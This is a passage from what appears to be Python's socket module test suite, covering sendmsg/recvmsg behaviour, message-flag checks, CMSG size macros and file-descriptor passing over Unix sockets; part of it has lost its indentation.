# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
# (built with getattr(..., 0) so missing constants contribute nothing).
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
    """Mixin mapping doRecvmsg() onto recvmsg_into() so the generic
    recvmsg tests also exercise the scatter-read variant."""

    def doRecvmsg(self, sock, bufsize, *args):
        buf = bytearray(bufsize)
        nbytes, *rest = sock.recvmsg_into([buf], *args)
        self.registerRecvmsgResult((nbytes, *rest))
        # recvmsg_into() reports how much of the buffer it filled; that
        # count can never exceed the buffer we handed it.
        self.assertGreaterEqual(nbytes, 0)
        self.assertLessEqual(nbytes, bufsize)
        # Present the same (data, ancdata, flags, addr) shape recvmsg()
        # would have returned.
        return (bytes(buf[:nbytes]), *rest)
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
# Datagram sockets signal truncation via MSG_TRUNC, so add it to
# the base class's "record incomplete" indicator bits.
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
# SCTP marks the end of a record with MSG_EOR, so add it to the
# base class's "record complete" indicator bits.
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
# sendmsg(buffers, ancdata, flags, address): always supply the
# server's address, since the socket is not connected.
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
# Plain send() has no address slot; use sendto() instead.
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
# The server reads from its end of the connection to the client.
return self.cli_conn
@property
def cli_sock(self):
# The client writes on its end of the connection to the server.
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
# Bound every server-side blocking call so a misbehaving client
# fails the test instead of hanging it.
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
# Each testFoo is the server side and runs concurrently with its
# _testFoo client-side partner (framework convention).
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
# Server just waits for the client's "done" handshake.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
# Ancillary items must be (level, type, data) triples of the
# right types; anything else is a TypeError.
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
# The error is raised in Python before any syscall, so no errno.
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
# Keep the server side alive until the client has finished, so
# the client's failure is the timeout rather than a reset.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
# Flood until the send buffer fills and the timeout fires.
while True:
self.sendmsgToServer([b"a"*512])
except socket.timeout:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("socket.timeout not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
# Flood until the non-blocking send would block.
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
# Neither an omitted address nor an explicit None is acceptable
# on an unconnected datagram socket.
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
    # Tests for recvmsg() which can also be emulated using
    # recvmsg_into(), and can use any socket type.
    # Each testFoo() here runs on the server side; the paired
    # _testFoo() runs on the client side and supplies the data.
    def testRecvmsg(self):
        # Receive a simple message with recvmsg[_into]().
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)
    def _testRecvmsg(self):
        self.sendToServer(MSG)
    def testRecvmsgExplicitDefaults(self):
        # Test recvmsg[_into]() with default arguments provided explicitly.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), 0, 0)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)
    def _testRecvmsgExplicitDefaults(self):
        self.sendToServer(MSG)
    def testRecvmsgShorter(self):
        # Receive a message smaller than buffer.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG) + 42)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)
    def _testRecvmsgShorter(self):
        self.sendToServer(MSG)
    def testRecvmsgTrunc(self):
        # Receive part of message, check for truncation indicators.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG) - 3)
        self.assertEqual(msg, MSG[:-3])
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        # eor=False: the record was not fully consumed.
        self.checkFlags(flags, eor=False)
    def _testRecvmsgTrunc(self):
        self.sendToServer(MSG)
    def testRecvmsgShortAncillaryBuf(self):
        # Test ancillary data buffer too small to hold any ancillary data.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), 1)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)
    def _testRecvmsgShortAncillaryBuf(self):
        self.sendToServer(MSG)
    def testRecvmsgLongAncillaryBuf(self):
        # Test large ancillary data buffer.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), 10240)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)
    def _testRecvmsgLongAncillaryBuf(self):
        self.sendToServer(MSG)
    def testRecvmsgAfterClose(self):
        # Check that recvmsg[_into]() fails on a closed socket.
        self.serv_sock.close()
        self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
    def _testRecvmsgAfterClose(self):
        # Client side has nothing to do here.
        pass
    def testRecvmsgTimeout(self):
        # Check that timeout works.
        try:
            self.serv_sock.settimeout(0.03)
            self.assertRaises(socket.timeout,
                              self.doRecvmsg, self.serv_sock, len(MSG))
        finally:
            # Release the client, which blocks in misc_event.wait().
            self.misc_event.set()
    def _testRecvmsgTimeout(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
    @requireAttrs(socket, "MSG_PEEK")
    def testRecvmsgPeek(self):
        # Check that MSG_PEEK in flags enables examination of pending
        # data without consuming it.

        # Receive part of data with MSG_PEEK.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG) - 3, 0,
                                                   socket.MSG_PEEK)
        self.assertEqual(msg, MSG[:-3])
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        # Ignoring MSG_TRUNC here (so this test is the same for stream
        # and datagram sockets).  Some wording in POSIX seems to
        # suggest that it needn't be set when peeking, but that may
        # just be a slip.
        self.checkFlags(flags, eor=False,
                        ignore=getattr(socket, "MSG_TRUNC", 0))

        # Receive all data with MSG_PEEK.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), 0,
                                                   socket.MSG_PEEK)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

        # Check that the same data can still be received normally.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)
    @testRecvmsgPeek.client_skip
    def _testRecvmsgPeek(self):
        self.sendToServer(MSG)
    @requireAttrs(socket.socket, "sendmsg")
    def testRecvmsgFromSendmsg(self):
        # Test receiving with recvmsg[_into]() when message is sent
        # using sendmsg().
        self.serv_sock.settimeout(self.fail_timeout)
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)
    @testRecvmsgFromSendmsg.client_skip
    def _testRecvmsgFromSendmsg(self):
        # Send MSG split over two buffers; it must arrive as one message.
        self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
    """Tests requiring a stream socket; usable with either recvmsg()
    or recvmsg_into()."""

    def testRecvmsgEOF(self):
        # The peer closes its end, so the read yields the empty bytes
        # object marking end-of-stream.
        data, anc, recv_flags, sender = self.doRecvmsg(self.serv_sock, 1024)
        self.assertEqual(data, b"")
        self.checkRecvmsgAddress(sender, self.cli_addr)
        self.assertEqual(anc, [])
        # End-of-record marker may or may not be present at EOF.
        self.checkFlags(recv_flags, eor=None)

    def _testRecvmsgEOF(self):
        self.cli_sock.close()

    def testRecvmsgOverflow(self):
        # Read the message in two pieces: a short read leaving three
        # bytes pending, then the remainder.
        part1, anc, recv_flags, sender = self.doRecvmsg(self.serv_sock,
                                                        len(MSG) - 3)
        self.checkRecvmsgAddress(sender, self.cli_addr)
        self.assertEqual(anc, [])
        self.checkFlags(recv_flags, eor=False)
        part2, anc, recv_flags, sender = self.doRecvmsg(self.serv_sock, 1024)
        self.checkRecvmsgAddress(sender, self.cli_addr)
        self.assertEqual(anc, [])
        self.checkFlags(recv_flags, eor=True)
        # The two pieces reassemble into the original message.
        self.assertEqual(part1 + part2, MSG)

    def _testRecvmsgOverflow(self):
        self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
    """Tests for recvmsg(), usable with any socket type."""

    def testRecvmsgBadArgs(self):
        # recvmsg() must reject missing and invalid arguments, and
        # still work correctly afterwards.
        recvmsg = self.serv_sock.recvmsg
        with self.assertRaises(TypeError):
            recvmsg()
        # Negative sizes are invalid values.
        with self.assertRaises(ValueError):
            recvmsg(-1, 0, 0)
        with self.assertRaises(ValueError):
            recvmsg(len(MSG), -1, 0)
        # Non-integer arguments are the wrong type.
        for bad_args in (([bytearray(10)], 0, 0),
                         (object(), 0, 0),
                         (len(MSG), object(), 0),
                         (len(MSG), 0, object())):
            with self.assertRaises(TypeError):
                recvmsg(*bad_args)
        # After all the failed calls, a correct call still consumes
        # the message the client sent.
        msg, ancdata, flags, addr = recvmsg(len(MSG), 0, 0)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgBadArgs(self):
        self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
    """Tests for recvmsg_into(), usable with any socket type."""

    def testRecvmsgIntoBadArgs(self):
        # recvmsg_into() must reject bad arguments and still be usable
        # for a correct call afterwards.
        buf = bytearray(len(MSG))
        recvmsg_into = self.serv_sock.recvmsg_into
        with self.assertRaises(TypeError):
            recvmsg_into()
        # The first argument must be an iterable of writable buffers.
        for bad_buffers in (len(MSG),
                            buf,
                            [object()],
                            [b"I'm not writable"],
                            [buf, object()]):
            with self.assertRaises(TypeError):
                recvmsg_into(bad_buffers, 0, 0)
        # Negative ancillary buffer size is an invalid value.
        with self.assertRaises(ValueError):
            recvmsg_into([buf], -1, 0)
        # Non-integer size/flags are the wrong type.
        with self.assertRaises(TypeError):
            recvmsg_into([buf], object(), 0)
        with self.assertRaises(TypeError):
            recvmsg_into([buf], 0, object())
        # A correct call now receives the client's message into buf.
        nbytes, ancdata, flags, addr = recvmsg_into([buf], 0, 0)
        self.assertEqual(nbytes, len(MSG))
        self.assertEqual(buf, bytearray(MSG))
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgIntoBadArgs(self):
        self.sendToServer(MSG)

    def testRecvmsgIntoGenerator(self):
        # The buffer argument may be any iterable, not just a sequence.
        buf = bytearray(len(MSG))
        nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
            iter([buf]))
        self.assertEqual(nbytes, len(MSG))
        self.assertEqual(buf, bytearray(MSG))
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgIntoGenerator(self):
        self.sendToServer(MSG)

    def testRecvmsgIntoArray(self):
        # An array.array works as a target buffer too.
        target = array.array("B", [0] * len(MSG))
        nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([target])
        self.assertEqual(nbytes, len(MSG))
        self.assertEqual(target.tobytes(), MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgIntoArray(self):
        self.sendToServer(MSG)

    def testRecvmsgIntoScatter(self):
        # Scatter one message across three buffers, the middle one
        # addressed through a memoryview slice.
        first = bytearray(b"----")
        middle = bytearray(b"0123456789")
        last = bytearray(b"--------------")
        nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
            [first, memoryview(middle)[2:9], last])
        self.assertEqual(nbytes, len(b"Mary had a little lamb"))
        self.assertEqual(first, bytearray(b"Mary"))
        self.assertEqual(middle, bytearray(b"01 had a 9"))
        self.assertEqual(last, bytearray(b"little lamb---"))
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgIntoScatter(self):
        self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
    """Exercise CMSG_LEN() and CMSG_SPACE(), validating the
    assumptions that sendmsg() and recvmsg[_into]() rely on (these
    functions share code with socketmodule.c)."""

    # Upper bound of socklen_t, matching the definition in
    # socketmodule.c.
    try:
        import _testcapi
    except ImportError:
        socklen_t_limit = 0x7fffffff
    else:
        socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)

    @requireAttrs(socket, "CMSG_LEN")
    def testCMSG_LEN(self):
        # Check CMSG_LEN() over small payload sizes and sizes just
        # below the overflow threshold.
        toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
        values = list(range(257)) + list(range(toobig - 257, toobig))

        # struct cmsghdr has at least three members, two of which are
        # ints, so the empty-payload length must exceed two ints.
        self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
        for size in values:
            result = socket.CMSG_LEN(size)
            # This is how recvmsg() recovers the data size.
            self.assertEqual(result - socket.CMSG_LEN(0), size)
            self.assertLessEqual(result, self.socklen_t_limit)

        # Out-of-range sizes must raise OverflowError; sendmsg()
        # shares this code and requires the rejection.
        for bad_size in (-1, toobig, sys.maxsize):
            self.assertRaises(OverflowError, socket.CMSG_LEN, bad_size)

    @requireAttrs(socket, "CMSG_SPACE")
    def testCMSG_SPACE(self):
        # CMSG_SPACE() must be monotonic and never smaller than
        # CMSG_LEN() for the same payload size.
        toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
        values = list(range(257)) + list(range(toobig - 257, toobig))

        previous = socket.CMSG_SPACE(0)
        # struct cmsghdr has at least three members, two of which are
        # ints.
        self.assertGreater(previous, array.array("i").itemsize * 2)
        for size in values:
            result = socket.CMSG_SPACE(size)
            self.assertGreaterEqual(result, previous)
            self.assertGreaterEqual(result, socket.CMSG_LEN(size))
            self.assertGreaterEqual(result, size + socket.CMSG_LEN(0))
            self.assertLessEqual(result, self.socklen_t_limit)
            previous = result

        # Out-of-range sizes must raise OverflowError; sendmsg()
        # shares this code and requires the rejection.
        for bad_size in (-1, toobig, sys.maxsize):
            self.assertRaises(OverflowError, socket.CMSG_SPACE, bad_size)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
    # Tests for file descriptor passing on Unix-domain sockets
    # (SCM_RIGHTS ancillary data).  Each testFoo() runs on the server
    # side; the paired _testFoo() runs on the client side.

    # Invalid file descriptor value that's unlikely to evaluate to a
    # real FD even if one of its bytes is replaced with a different
    # value (which shouldn't actually happen).
    badfd = -0x5555

    def newFDs(self, n):
        # Return a list of n file descriptors for newly-created files
        # containing their list indices as ASCII numbers.
        fds = []
        for i in range(n):
            fd, path = tempfile.mkstemp()
            self.addCleanup(os.unlink, path)
            self.addCleanup(os.close, fd)
            os.write(fd, str(i).encode())
            fds.append(fd)
        return fds

    def checkFDs(self, fds):
        # Check that the file descriptors in the given list contain
        # their correct list indices as ASCII numbers.
        for n, fd in enumerate(fds):
            os.lseek(fd, 0, os.SEEK_SET)
            self.assertEqual(os.read(fd, 1024), str(n).encode())

    def registerRecvmsgResult(self, result):
        # Ensure any FDs carried in result's ancillary data are closed
        # during test cleanup.
        self.addCleanup(self.closeRecvmsgFDs, result)

    def closeRecvmsgFDs(self, recvmsg_result):
        # Close all file descriptors specified in the ancillary data
        # of the given return value from recvmsg() or recvmsg_into().
        for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
            if (cmsg_level == socket.SOL_SOCKET and
                    cmsg_type == socket.SCM_RIGHTS):
                fds = array.array("i")
                # Drop any trailing partial int before decoding FDs.
                fds.frombytes(cmsg_data[:
                        len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
                for fd in fds:
                    os.close(fd)

    def createAndSendFDs(self, n):
        # Send n new file descriptors created by newFDs() to the
        # server, with the constant MSG as the non-ancillary data.
        self.assertEqual(
            self.sendmsgToServer([MSG],
                                 [(socket.SOL_SOCKET,
                                   socket.SCM_RIGHTS,
                                   array.array("i", self.newFDs(n)))]),
            len(MSG))

    def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
        # Check that constant MSG was received with numfds file
        # descriptors in a maximum of maxcmsgs control messages (which
        # must contain only complete integers).  By default, check
        # that MSG_CTRUNC is unset, but ignore any flags in
        # ignoreflags.
        msg, ancdata, flags, addr = result
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
                        ignore=ignoreflags)

        self.assertIsInstance(ancdata, list)
        self.assertLessEqual(len(ancdata), maxcmsgs)
        fds = array.array("i")
        for item in ancdata:
            self.assertIsInstance(item, tuple)
            cmsg_level, cmsg_type, cmsg_data = item
            self.assertEqual(cmsg_level, socket.SOL_SOCKET)
            self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
            self.assertIsInstance(cmsg_data, bytes)
            # Data must be a whole number of ints (complete FDs only).
            self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
            fds.frombytes(cmsg_data)

        self.assertEqual(len(fds), numfds)
        self.checkFDs(fds)

    def testFDPassSimple(self):
        # Pass a single FD (array read from bytes object).
        self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
                                               len(MSG), 10240))

    def _testFDPassSimple(self):
        self.assertEqual(
            self.sendmsgToServer(
                [MSG],
                [(socket.SOL_SOCKET,
                  socket.SCM_RIGHTS,
                  array.array("i", self.newFDs(1)).tobytes())]),
            len(MSG))

    def testMultipleFDPass(self):
        # Pass multiple FDs in a single array.
        self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
                                               len(MSG), 10240))

    def _testMultipleFDPass(self):
        self.createAndSendFDs(4)

    @requireAttrs(socket, "CMSG_SPACE")
    def testFDPassCMSG_SPACE(self):
        # Test using CMSG_SPACE() to calculate ancillary buffer size.
        self.checkRecvmsgFDs(
            4, self.doRecvmsg(self.serv_sock, len(MSG),
                              socket.CMSG_SPACE(4 * SIZEOF_INT)))

    @testFDPassCMSG_SPACE.client_skip
    def _testFDPassCMSG_SPACE(self):
        self.createAndSendFDs(4)

    def testFDPassCMSG_LEN(self):
        # Test using CMSG_LEN() to calculate ancillary buffer size.
        self.checkRecvmsgFDs(1,
                             self.doRecvmsg(self.serv_sock, len(MSG),
                                            socket.CMSG_LEN(4 * SIZEOF_INT)),
                             # RFC 3542 says implementations may set
                             # MSG_CTRUNC if there isn't enough space
                             # for trailing padding.
                             ignoreflags=socket.MSG_CTRUNC)

    def _testFDPassCMSG_LEN(self):
        self.createAndSendFDs(1)

    @unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
    @unittest.skipIf(AIX, "skipping, see issue #22397")
    @requireAttrs(socket, "CMSG_SPACE")
    def testFDPassSeparate(self):
        # Pass two FDs in two separate arrays.  Arrays may be combined
        # into a single control message by the OS.
        self.checkRecvmsgFDs(2,
                             self.doRecvmsg(self.serv_sock, len(MSG), 10240),
                             maxcmsgs=2)

    @testFDPassSeparate.client_skip
    @unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
    @unittest.skipIf(AIX, "skipping, see issue #22397")
    def _testFDPassSeparate(self):
        fd0, fd1 = self.newFDs(2)
        self.assertEqual(
            self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
                                          socket.SCM_RIGHTS,
                                          array.array("i", [fd0])),
                                         (socket.SOL_SOCKET,
                                          socket.SCM_RIGHTS,
